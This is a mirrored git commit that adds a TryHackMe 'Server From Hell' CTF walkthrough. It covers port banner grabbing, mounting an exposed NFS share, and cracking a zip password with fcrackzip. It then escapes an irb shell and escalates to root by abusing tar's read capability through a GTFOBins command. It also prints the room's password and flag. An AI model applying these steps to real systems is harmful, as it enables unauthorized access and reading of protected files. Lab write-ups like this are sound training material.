mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-21 19:43:03 +00:00
Add files via upload
This commit is contained in:
parent
8ef9098229
commit
f358a0616f
1 changed files with 161 additions and 0 deletions
161
TryHackMe/Server_From_Hell.md
Normal file
161
TryHackMe/Server_From_Hell.md
Normal file
|
@ -0,0 +1,161 @@
|
|||
# TryHackMe-Server From Hell
|
||||
|
||||
> Abdullah Rizwan | 05:54 PM | 3rd November ,2020
|
||||
|
||||
## NMAP
|
||||
|
||||
```
|
||||
Not shown: 94 closed ports
|
||||
PORT STATE SERVICE VERSION
|
||||
1/tcp open tcpmux?
|
||||
| fingerprint-strings:
|
||||
| NULL:
|
||||
|_ 550 12345 0000000000000000000000000000000000000000000000000000000
|
||||
3/tcp open compressnet?
|
||||
| fingerprint-strings:
|
||||
| NULL:
|
||||
|_ 550 12345 0000000000000000000000000000000000000000000000000000000
|
||||
4/tcp open unknown
|
||||
| fingerprint-strings:
|
||||
| NULL:
|
||||
|_ 550 12345 0000000000000000000000000000000000000000000000000000000
|
||||
6/tcp open unknown
|
||||
........
|
||||
|
||||
There were many ports open in this box so can't really show how many ports were there
|
||||
```
|
||||
|
||||
Looking at the description of the room it says about starting from `1337` ,so
|
||||
|
||||
## PORT 1337
|
||||
|
||||
`nc IP:1337`
|
||||
|
||||
```
|
||||
Welcome traveller, to the beginning of your journey
|
||||
To begin, find the trollface
|
||||
Legend says he's hiding in the first 100 ports
|
||||
Try printing the banners from the ports
|
||||
|
||||
```
|
||||
This is the message we get when we connect to port 1337
|
||||
|
||||
I made a simple script to go over 100 ports and connect to it to grab banner
|
||||
|
||||
|
||||
```
|
||||
i=1
|
||||
while [ $i -ne 100 ]
|
||||
do
|
||||
nc 10.10.173.96 $i
|
||||
i=$(( $i + 1 ))
|
||||
done
|
||||
|
||||
```
|
||||
<img src="https://imgur.com/X2RBWne.png"/>
|
||||
|
||||
|
||||
## PORT 12345
|
||||
|
||||
```
|
||||
nc 10.10.173.96 12345
|
||||
NFS shares are cool, especially when they are misconfigured
|
||||
It's on the standard port, no need for another scan
|
||||
```
|
||||
|
||||
## PORT 2049
|
||||
|
||||
The default port of `nfs` share is 2049 so lets see if there are any shares that we can mount on our local machine
|
||||
|
||||
<img src="https://imgur.com/ZsfnVwC.png"/>
|
||||
|
||||
Now let's mount that share
|
||||
|
||||
<img src="https://imgur.com/SDYKjPV.png"/>
|
||||
|
||||
We only find a `backup.zip`
|
||||
|
||||
<img src="https://imgur.com/VVLeFOp.png"/>
|
||||
|
||||
But it asks for a password
|
||||
|
||||
<img src="https://imgur.com/PdxqCba.png"/>
|
||||
|
||||
### Fcrackzip
|
||||
|
||||
Now lets use this to bruteforce archive's password
|
||||
|
||||
```
|
||||
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt backup.zip
|
||||
|
||||
|
||||
PASSWORD FOUND!!!!: pw == zxcvbnm
|
||||
```
|
||||
<img src="https://imgur.com/mqLJMVD.png"/>
|
||||
|
||||
But I can't get to extract the files becasue `read-only file system` , so I used GUI to view what was in these files
|
||||
|
||||
<img src="https://imgur.com/0aJE2Xt.png"/>
|
||||
|
||||
And I was able to grab the flag,hint and ssh private key.
|
||||
|
||||
|
||||
Now `hint.txt` says
|
||||
|
||||
```
|
||||
2500-4500
|
||||
```
|
||||
|
||||
I tried to ssh into the box using `hades` private but ssh port was not on 22
|
||||
|
||||
<img src="https://imgur.com/PfSORcz.png"/>
|
||||
|
||||
From the results of the scan I searched for ssh with openssh client
|
||||
|
||||
<img src="https://imgur.com/mgG3s7s.png"/>
|
||||
|
||||
And was logged in :D
|
||||
|
||||
<img src="https://imgur.com/2j3o2wy.png"/>
|
||||
|
||||
```
|
||||
Welcome to hell. We hope you enjoy your stay!
|
||||
irb(main):001:0> puts 'hello'
|
||||
hello
|
||||
=> nil
|
||||
irb(main):002:0>
|
||||
|
||||
```
|
||||
|
||||
Now this `irb` is interactive ruby shell just like we get in python so in order to get a `/bin/bash` shell run
|
||||
|
||||
```
|
||||
exec '/bin/bash'
|
||||
```
|
||||
|
||||
<img src="https://imgur.com/TagPPFG.png"/>
|
||||
|
||||
## Privilege Escalation
|
||||
|
||||
Now the room gives us a hint about `getcap` this command tells that which file or binary has capability to access almost anything on the system so run
|
||||
|
||||
`getcap -r 2>/dev/null` (2>/dev/null ,here 2 just redirects Standard output error to null )
|
||||
|
||||
|
||||
```
|
||||
hades@hell:~$ getcap -r / 2>/dev/null
|
||||
/usr/bin/mtr-packet = cap_net_raw+ep
|
||||
/bin/tar = cap_dac_read_search+ep
|
||||
```
|
||||
Visiting `GTFOBINS`
|
||||
|
||||
https://gtfobins.github.io/gtfobins/tar/
|
||||
```
|
||||
hades@hell:~$ tar xf /root/root.txt -I '/bin/sh -c "cat 1>&2"'
|
||||
thm{w0w_n1c3_3sc4l4t10n}
|
||||
hades@hell:~$
|
||||
|
||||
```
|
||||
|
||||
|
||||
|
Loading…
Reference in a new issue